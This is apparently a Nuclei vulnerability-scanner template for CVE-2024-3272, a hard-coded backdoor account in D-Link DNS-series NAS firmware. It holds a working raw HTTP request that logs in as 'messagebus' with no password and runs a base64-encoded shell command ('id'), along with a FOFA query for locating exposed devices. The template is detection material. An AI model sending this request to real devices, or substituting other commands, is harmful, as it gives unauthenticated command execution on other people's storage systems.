id: CVE-2024-3272

info:
  name: D-Link Network Attached Storage - Backdoor Account
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials.
  impact: |
    Attackers can use hardcoded credentials to gain unauthorized access to D-Link NAS devices and execute commands.
  remediation: |
    Update D-Link NAS firmware to a version that removes the backdoor account.
  reference:
    - https://github.com/netsecfish/dlink
    - https://nvd.nist.gov/vuln/detail/cve-2024-3272
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3272
    cwe-id: CWE-77
    cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:*
    epss-score: 0.94113
    epss-percentile: 0.99914
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: "dns-320l_firmware"
    fofa-query: app="D_Link-DNS-ShareCenter"
  tags: cve,cve2024,dlink,nas,kev,vkev,vuln

http:
  - raw:
      - |+
        GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1
        Host: {{Hostname}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<auth_state>1</auth_state>"

      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a2a30d37373ea0dad14da49a421971520b39b18644a922e4b2635083e9c6a8c702210089ed73ee6a415e9864fe2cc957eabce9e99c9790ac3549fd6045a68966d808e3:922c64590222798bb761d5b6d8e72950